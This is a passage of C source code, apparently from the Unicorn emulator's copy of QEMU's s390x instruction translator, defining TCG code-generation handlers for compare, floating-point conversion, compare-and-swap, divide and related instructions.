*o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); int r3 = get_field(s, r3); bool is_imm = have_field(s, i2); int imm = is_imm ? get_field(s, i2) : 0; DisasCompare c; c.cond = (s->insn->data ? TCG_COND_LE : TCG_COND_GT); c.is_64 = true; if (r1 == (r3 | 1)) { c.u.s64.b = load_reg(tcg_ctx, r3 | 1); c.g2 = false; } else { c.u.s64.b = tcg_ctx->regs[r3 | 1]; c.g2 = true; } tcg_gen_add_i64(tcg_ctx, tcg_ctx->regs[r1], tcg_ctx->regs[r1], tcg_ctx->regs[r3]); c.u.s64.a = tcg_ctx->regs[r1]; c.g1 = true; return help_branch(s, &c, is_imm, imm, o->in2); } static DisasJumpType op_cj(DisasContext *s, DisasOps *o) { int imm, m3 = get_field(s, m3); bool is_imm; DisasCompare c; c.cond = ltgt_cond[m3]; if (s->insn->data) { c.cond = tcg_unsigned_cond(c.cond); } c.is_64 = c.g1 = c.g2 = true; c.u.s64.a = o->in1; c.u.s64.b = o->in2; is_imm = have_field(s, i4); if (is_imm) { imm = get_field(s, i4); } else { imm = 0; o->out = get_address(s, 0, get_field(s, b4), get_field(s, d4)); } return help_branch(s, &c, is_imm, imm, o->out); } static DisasJumpType op_ceb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_ceb(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, o->in1, o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_cdb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_cdb(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, o->in1, o->in2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_cxb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_cxb(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, o->out, o->out2, o->in1, o->in2); set_cc_static(s); return DISAS_NEXT; } static TCGv_i32 fpinst_extract_m34(DisasContext *s, bool m3_with_fpe, bool m4_with_fpe) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const bool fpe = s390_has_feat(s->uc, S390_FEAT_FLOATING_POINT_EXT); uint8_t m3 = get_field(s, m3); uint8_t m4 = get_field(s, m4); /* m3 field was introduced with FPE */ if (!fpe && m3_with_fpe) { m3 = 0; } /* m4 field was introduced with FPE */ if (!fpe && m4_with_fpe) { m4 = 0; } /* Check for valid rounding modes. Mode 3 was introduced later. */ if (m3 == 2 || m3 > 7 || (!fpe && m3 == 3)) { gen_program_exception(s, PGM_SPECIFICATION); return NULL; } return tcg_const_i32(tcg_ctx, deposit32(m3, 4, 4, m4)); } static DisasJumpType op_cfeb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, false, true); if (!m34) { return DISAS_NORETURN; } gen_helper_cfeb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); gen_set_cc_nz_f32(s, o->in2); return DISAS_NEXT; } static DisasJumpType op_cfdb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, false, true); if (!m34) { return DISAS_NORETURN; } gen_helper_cfdb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); gen_set_cc_nz_f64(s, o->in2); return DISAS_NEXT; } static DisasJumpType op_cfxb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, false, true); if (!m34) { return DISAS_NORETURN; } gen_helper_cfxb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in1, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); gen_set_cc_nz_f128(s, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_cgeb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, false, true); if (!m34) { return DISAS_NORETURN; } gen_helper_cgeb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); gen_set_cc_nz_f32(s, o->in2); return DISAS_NEXT; } static DisasJumpType op_cgdb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, false, true); if (!m34) { return DISAS_NORETURN; } gen_helper_cgdb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); gen_set_cc_nz_f64(s, o->in2); return DISAS_NEXT; } static DisasJumpType op_cgxb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, false, true); if (!m34) { return DISAS_NORETURN; } gen_helper_cgxb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in1, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); gen_set_cc_nz_f128(s, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_clfeb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, false, false); if (!m34) { return DISAS_NORETURN; } gen_helper_clfeb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); gen_set_cc_nz_f32(s, o->in2); return DISAS_NEXT; } static DisasJumpType op_clfdb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, false, false); if (!m34) { return DISAS_NORETURN; } gen_helper_clfdb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); gen_set_cc_nz_f64(s, o->in2); return DISAS_NEXT; } static DisasJumpType op_clfxb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, false, false); if (!m34) { return DISAS_NORETURN; } gen_helper_clfxb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in1, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); gen_set_cc_nz_f128(s, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_clgeb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, false, false); if (!m34) { return DISAS_NORETURN; } gen_helper_clgeb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); gen_set_cc_nz_f32(s, o->in2); return DISAS_NEXT; } static DisasJumpType op_clgdb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, false, false); if (!m34) { return DISAS_NORETURN; } gen_helper_clgdb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); gen_set_cc_nz_f64(s, o->in2); return DISAS_NEXT; } static DisasJumpType op_clgxb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, false, false); if (!m34) { return DISAS_NORETURN; } gen_helper_clgxb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in1, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); gen_set_cc_nz_f128(s, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_cegb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, true, true); if (!m34) { return DISAS_NORETURN; } gen_helper_cegb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); return DISAS_NEXT; } static DisasJumpType op_cdgb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, true, true); if (!m34) { return DISAS_NORETURN; } gen_helper_cdgb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); return DISAS_NEXT; } static DisasJumpType op_cxgb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, true, true); if (!m34) { return DISAS_NORETURN; } gen_helper_cxgb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); return_low128(tcg_ctx, o->out2); return DISAS_NEXT; } static DisasJumpType op_celgb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, false, false); if (!m34) { return DISAS_NORETURN; } gen_helper_celgb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); return DISAS_NEXT; } static DisasJumpType op_cdlgb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, false, false); if (!m34) { return DISAS_NORETURN; } gen_helper_cdlgb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); return DISAS_NEXT; } static DisasJumpType op_cxlgb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, false, false); if (!m34) { return DISAS_NORETURN; } gen_helper_cxlgb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); return_low128(tcg_ctx, o->out2); return DISAS_NEXT; } static DisasJumpType op_cksm(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r2 = get_field(s, r2); TCGv_i64 len = tcg_temp_new_i64(tcg_ctx); gen_helper_cksm(tcg_ctx, len, tcg_ctx->cpu_env, o->in1, o->in2, tcg_ctx->regs[r2 + 1]); set_cc_static(s); return_low128(tcg_ctx, o->out); tcg_gen_add_i64(tcg_ctx, tcg_ctx->regs[r2], tcg_ctx->regs[r2], len); tcg_gen_sub_i64(tcg_ctx, tcg_ctx->regs[r2 + 1], tcg_ctx->regs[r2 + 1], len); tcg_temp_free_i64(tcg_ctx, len); return DISAS_NEXT; } static DisasJumpType op_clc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int l = get_field(s, l1); TCGv_i32 vl; switch (l + 1) { case 1: tcg_gen_qemu_ld8u(tcg_ctx, tcg_ctx->cc_src, o->addr1, get_mem_index(s)); tcg_gen_qemu_ld8u(tcg_ctx, tcg_ctx->cc_dst, o->in2, get_mem_index(s)); break; case 2: tcg_gen_qemu_ld16u(tcg_ctx, tcg_ctx->cc_src, o->addr1, get_mem_index(s)); tcg_gen_qemu_ld16u(tcg_ctx, tcg_ctx->cc_dst, o->in2, get_mem_index(s)); break; case 4: tcg_gen_qemu_ld32u(tcg_ctx, tcg_ctx->cc_src, o->addr1, get_mem_index(s)); tcg_gen_qemu_ld32u(tcg_ctx, tcg_ctx->cc_dst, o->in2, get_mem_index(s)); break; case 8: tcg_gen_qemu_ld64(tcg_ctx, tcg_ctx->cc_src, o->addr1, get_mem_index(s)); tcg_gen_qemu_ld64(tcg_ctx, tcg_ctx->cc_dst, o->in2, get_mem_index(s)); break; default: vl = tcg_const_i32(tcg_ctx, l); gen_helper_clc(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, vl, o->addr1, o->in2); tcg_temp_free_i32(tcg_ctx, vl); set_cc_static(s); return DISAS_NEXT; } gen_op_update2_cc_i64(s, CC_OP_LTUGTU_64, tcg_ctx->cc_src, tcg_ctx->cc_dst); return DISAS_NEXT; } static DisasJumpType op_clcl(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); int r2 = get_field(s, r2); TCGv_i32 t1, t2; /* r1 and r2 must be even. */ if (r1 & 1 || r2 & 1) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } t1 = tcg_const_i32(tcg_ctx, r1); t2 = tcg_const_i32(tcg_ctx, r2); gen_helper_clcl(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, t1, t2); tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t2); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_clcle(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); int r3 = get_field(s, r3); TCGv_i32 t1, t3; /* r1 and r3 must be even. */ if (r1 & 1 || r3 & 1) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } t1 = tcg_const_i32(tcg_ctx, r1); t3 = tcg_const_i32(tcg_ctx, r3); gen_helper_clcle(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, t1, o->in2, t3); tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t3); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_clclu(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); int r3 = get_field(s, r3); TCGv_i32 t1, t3; /* r1 and r3 must be even. */ if (r1 & 1 || r3 & 1) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } t1 = tcg_const_i32(tcg_ctx, r1); t3 = tcg_const_i32(tcg_ctx, r3); gen_helper_clclu(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, t1, o->in2, t3); tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t3); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_clm(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m3 = tcg_const_i32(tcg_ctx, get_field(s, m3)); TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, t1, o->in1); gen_helper_clm(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, t1, m3, o->in2); set_cc_static(s); tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, m3); return DISAS_NEXT; } static DisasJumpType op_clst(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_clst(tcg_ctx, o->in1, tcg_ctx->cpu_env, tcg_ctx->regs[0], o->in1, o->in2); set_cc_static(s); return_low128(tcg_ctx, o->in2); return DISAS_NEXT; } static DisasJumpType op_cps(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); tcg_gen_andi_i64(tcg_ctx, t, o->in1, 0x8000000000000000ull); tcg_gen_andi_i64(tcg_ctx, o->out, o->in2, 0x7fffffffffffffffull); tcg_gen_or_i64(tcg_ctx, o->out, o->out, t); tcg_temp_free_i64(tcg_ctx, t); return DISAS_NEXT; } static DisasJumpType op_cs(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int d2 = get_field(s, d2); int b2 = get_field(s, b2); TCGv_i64 addr, cc; /* Note that in1 = R3 (new value) and in2 = (zero-extended) R1 (expected value). */ addr = get_address(s, 0, b2, d2); tcg_gen_atomic_cmpxchg_i64(tcg_ctx, o->out, addr, o->in2, o->in1, get_mem_index(s), s->insn->data | MO_ALIGN); tcg_temp_free_i64(tcg_ctx, addr); /* Are the memory and expected values (un)equal? Note that this setcond produces the output CC value, thus the NE sense of the test. */ cc = tcg_temp_new_i64(tcg_ctx); tcg_gen_setcond_i64(tcg_ctx, TCG_COND_NE, cc, o->in2, o->out); tcg_gen_extrl_i64_i32(tcg_ctx, tcg_ctx->cc_op, cc); tcg_temp_free_i64(tcg_ctx, cc); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_cdsg(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); int r3 = get_field(s, r3); int d2 = get_field(s, d2); int b2 = get_field(s, b2); DisasJumpType ret = DISAS_NEXT; TCGv_i64 addr; TCGv_i32 t_r1, t_r3; /* Note that R1:R1+1 = expected value and R3:R3+1 = new value. */ addr = get_address(s, 0, b2, d2); t_r1 = tcg_const_i32(tcg_ctx, r1); t_r3 = tcg_const_i32(tcg_ctx, r3); if (!(tb_cflags(s->base.tb) & CF_PARALLEL)) { gen_helper_cdsg(tcg_ctx, tcg_ctx->cpu_env, addr, t_r1, t_r3); } else if (HAVE_CMPXCHG128) { gen_helper_cdsg_parallel(tcg_ctx, tcg_ctx->cpu_env, addr, t_r1, t_r3); } else { gen_helper_exit_atomic(tcg_ctx, tcg_ctx->cpu_env); ret = DISAS_NORETURN; } tcg_temp_free_i64(tcg_ctx, addr); tcg_temp_free_i32(tcg_ctx, t_r1); tcg_temp_free_i32(tcg_ctx, t_r3); set_cc_static(s); return ret; } static DisasJumpType op_csst(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r3 = get_field(s, r3); TCGv_i32 t_r3 = tcg_const_i32(tcg_ctx, r3); if (tb_cflags(s->base.tb) & CF_PARALLEL) { gen_helper_csst_parallel(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, t_r3, o->addr1, o->in2); } else { gen_helper_csst(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, t_r3, o->addr1, o->in2); } tcg_temp_free_i32(tcg_ctx, t_r3); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_csp(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; MemOp mop = s->insn->data; TCGv_i64 addr, old, cc; TCGLabel *lab = gen_new_label(tcg_ctx); /* Note that in1 = R1 (zero-extended expected value), out = R1 (original reg), out2 = R1+1 (new value). */ addr = tcg_temp_new_i64(tcg_ctx); old = tcg_temp_new_i64(tcg_ctx); tcg_gen_andi_i64(tcg_ctx, addr, o->in2, -1ULL << (mop & MO_SIZE)); tcg_gen_atomic_cmpxchg_i64(tcg_ctx, old, addr, o->in1, o->out2, get_mem_index(s), mop | MO_ALIGN); tcg_temp_free_i64(tcg_ctx, addr); /* Are the memory and expected values (un)equal? */ cc = tcg_temp_new_i64(tcg_ctx); tcg_gen_setcond_i64(tcg_ctx, TCG_COND_NE, cc, o->in1, old); tcg_gen_extrl_i64_i32(tcg_ctx, tcg_ctx->cc_op, cc); /* Write back the output now, so that it happens before the following branch, so that we don't need local temps. */ if ((mop & MO_SIZE) == MO_32) { tcg_gen_deposit_i64(tcg_ctx, o->out, o->out, old, 0, 32); } else { tcg_gen_mov_i64(tcg_ctx, o->out, old); } tcg_temp_free_i64(tcg_ctx, old); /* If the comparison was equal, and the LSB of R2 was set, then we need to flush the TLB (for all cpus). */ tcg_gen_xori_i64(tcg_ctx, cc, cc, 1); tcg_gen_and_i64(tcg_ctx, cc, cc, o->in2); tcg_gen_brcondi_i64(tcg_ctx, TCG_COND_EQ, cc, 0, lab); tcg_temp_free_i64(tcg_ctx, cc); gen_helper_purge(tcg_ctx, tcg_ctx->cpu_env); gen_set_label(tcg_ctx, lab); return DISAS_NEXT; } static DisasJumpType op_cvd(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, t2, o->in1); gen_helper_cvd(tcg_ctx, t1, t2); tcg_temp_free_i32(tcg_ctx, t2); tcg_gen_qemu_st64(tcg_ctx, t1, o->in2, get_mem_index(s)); tcg_temp_free_i64(tcg_ctx, t1); return DISAS_NEXT; } static DisasJumpType op_ct(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int m3 = get_field(s, m3); TCGLabel *lab = gen_new_label(tcg_ctx); TCGCond c; c = tcg_invert_cond(ltgt_cond[m3]); if (s->insn->data) { c = tcg_unsigned_cond(c); } tcg_gen_brcond_i64(tcg_ctx, c, o->in1, o->in2, lab); /* Trap. */ gen_trap(s); gen_set_label(tcg_ctx, lab); return DISAS_NEXT; } static DisasJumpType op_cuXX(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int m3 = get_field(s, m3); int r1 = get_field(s, r1); int r2 = get_field(s, r2); TCGv_i32 tr1, tr2, chk; /* R1 and R2 must both be even. */ if ((r1 | r2) & 1) { gen_program_exception(s, PGM_SPECIFICATION); return DISAS_NORETURN; } if (!s390_has_feat(s->uc, S390_FEAT_ETF3_ENH)) { m3 = 0; } tr1 = tcg_const_i32(tcg_ctx, r1); tr2 = tcg_const_i32(tcg_ctx, r2); chk = tcg_const_i32(tcg_ctx, m3); switch (s->insn->data) { case 12: gen_helper_cu12(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, tr1, tr2, chk); break; case 14: gen_helper_cu14(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, tr1, tr2, chk); break; case 21: gen_helper_cu21(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, tr1, tr2, chk); break; case 24: gen_helper_cu24(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, tr1, tr2, chk); break; case 41: gen_helper_cu41(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, tr1, tr2, chk); break; case 42: gen_helper_cu42(tcg_ctx, tcg_ctx->cc_op, tcg_ctx->cpu_env, tr1, tr2, chk); break; default: //g_assert_not_reached(); break; } tcg_temp_free_i32(tcg_ctx, tr1); tcg_temp_free_i32(tcg_ctx, tr2); tcg_temp_free_i32(tcg_ctx, chk); set_cc_static(s); return DISAS_NEXT; } static DisasJumpType op_diag(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 r1 = tcg_const_i32(tcg_ctx, get_field(s, r1)); TCGv_i32 r3 = tcg_const_i32(tcg_ctx, get_field(s, r3)); TCGv_i32 func_code = tcg_const_i32(tcg_ctx, get_field(s, i2)); gen_helper_diag(tcg_ctx, tcg_ctx->cpu_env, r1, r3, func_code); tcg_temp_free_i32(tcg_ctx, func_code); tcg_temp_free_i32(tcg_ctx, r3); tcg_temp_free_i32(tcg_ctx, r1); return DISAS_NEXT; } static DisasJumpType op_divs32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_divs32(tcg_ctx, o->out2, tcg_ctx->cpu_env, o->in1, o->in2); return_low128(tcg_ctx, o->out); return DISAS_NEXT; } static DisasJumpType op_divu32(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_divu32(tcg_ctx, o->out2, tcg_ctx->cpu_env, o->in1, o->in2); return_low128(tcg_ctx, o->out); return DISAS_NEXT; } static DisasJumpType op_divs64(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_divs64(tcg_ctx, o->out2, tcg_ctx->cpu_env, o->in1, o->in2); return_low128(tcg_ctx, o->out); return DISAS_NEXT; } static DisasJumpType op_divu64(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_divu64(tcg_ctx, o->out2, tcg_ctx->cpu_env, o->out, o->out2, o->in2); return_low128(tcg_ctx, o->out); return DISAS_NEXT; } static DisasJumpType op_deb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_deb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_ddb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_ddb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in1, o->in2); return DISAS_NEXT; } static DisasJumpType op_dxb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_helper_dxb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->out, o->out2, o->in1, o->in2); return_low128(tcg_ctx, o->out2); return DISAS_NEXT; } static DisasJumpType op_ear(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r2 = get_field(s, r2); tcg_gen_ld32u_i64(tcg_ctx, o->out, tcg_ctx->cpu_env, offsetof(CPUS390XState, aregs[r2])); return DISAS_NEXT; } static DisasJumpType op_ecag(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* No cache information provided. */ tcg_gen_movi_i64(tcg_ctx, o->out, -1); return DISAS_NEXT; } static DisasJumpType op_efpc(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_ld32u_i64(tcg_ctx, o->out, tcg_ctx->cpu_env, offsetof(CPUS390XState, fpc)); return DISAS_NEXT; } static DisasJumpType op_epsw(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); int r2 = get_field(s, r2); TCGv_i64 t = tcg_temp_new_i64(tcg_ctx); /* Note the "subsequently" in the PoO, which implies a defined result if r1 == r2. Thus we cannot defer these writes to an output hook. */ tcg_gen_shri_i64(tcg_ctx, t, tcg_ctx->psw_mask, 32); store_reg32_i64(tcg_ctx, r1, t); if (r2 != 0) { store_reg32_i64(tcg_ctx, r2, tcg_ctx->psw_mask); } tcg_temp_free_i64(tcg_ctx, t); return DISAS_NEXT; } static DisasJumpType op_ex(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int r1 = get_field(s, r1); TCGv_i32 ilen; TCGv_i64 v1; /* Nested EXECUTE is not allowed. */ if (unlikely(s->ex_value)) { gen_program_exception(s, PGM_EXECUTE); return DISAS_NORETURN; } update_psw_addr(s); update_cc_op(s); if (r1 == 0) { v1 = tcg_const_i64(tcg_ctx, 0); } else { v1 = tcg_ctx->regs[r1]; } ilen = tcg_const_i32(tcg_ctx, s->ilen); gen_helper_ex(tcg_ctx, tcg_ctx->cpu_env, ilen, v1, o->in2); tcg_temp_free_i32(tcg_ctx, ilen); if (r1 == 0) { tcg_temp_free_i64(tcg_ctx, v1); } return DISAS_PC_CC_UPDATED; } static DisasJumpType op_fieb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, false, true); if (!m34) { return DISAS_NORETURN; } gen_helper_fieb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); return DISAS_NEXT; } static DisasJumpType op_fidb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, false, true); if (!m34) { return DISAS_NORETURN; } gen_helper_fidb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in2, m34); tcg_temp_free_i32(tcg_ctx, m34); return DISAS_NEXT; } static DisasJumpType op_fixb(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 m34 = fpinst_extract_m34(s, false, true); if (!m34) { return DISAS_NORETURN; } gen_helper_fixb(tcg_ctx, o->out, tcg_ctx->cpu_env, o->in1, o->in2, m34); return_low128(tcg_ctx, o->out2); tcg_temp_free_i32(tcg_ctx, m34); return DISAS_NEXT; } static DisasJumpType op_flogr(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* We'll use the original input for cc computation, since we get to compare that against 0, which ought to be better than comparing the real output against 64. It also lets cc_dst be a convenient temporary during our computation. */ gen_op_update1_cc_i64(s, CC_OP_FLOGR, o->in2); /* R1 = IN ? CLZ(IN) : 64. */ tcg_gen_clzi_i64(tcg_ctx, o->out, o->in2, 64); /* R1+1 = IN & ~(found bit). Note that we may attempt to shift this value by 64, which is undefined. But since the shift is 64 iff the input is zero, we still get the correct result after and'ing. */ tcg_gen_movi_i64(tcg_ctx, o->out2, 0x8000000000000000ull); tcg_gen_shr_i64(tcg_ctx, o->out2, o->out2, o->out); tcg_gen_andc_i64(tcg_ctx, o->out2, tcg_ctx->cc_dst, o->out2); return DISAS_NEXT; } static DisasJumpType op_icm(DisasContext *s, DisasOps *o) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int m3 = get_field(s, m3); int pos, len, base = s->insn->data; TCGv_i64 tmp = tcg_temp_new_i64(tcg_ctx); uint64_t ccm; switch (m3) { case 0xf: /* Effectively a 32-bit load. */ tcg_gen_qemu_ld32u(tcg_ctx, tmp, o->in2, get_mem_index(s)); len = 32; goto one_insert; case 0xc: case 0x6: case 0x3: /* Effectively a 16-bit load. */ tcg_gen_qemu_ld16u(tcg_ctx, tmp, o->in2, get_mem_index(s)); len = 16; goto one_insert; case 0x8: case 0x4: case 0x2: case 0x1: /* Effectively an 8-bit load. */ tcg_gen_qemu_ld8u(tcg_ctx, tmp, o->in2, get_mem_index(s)); len = 8; goto one_insert; 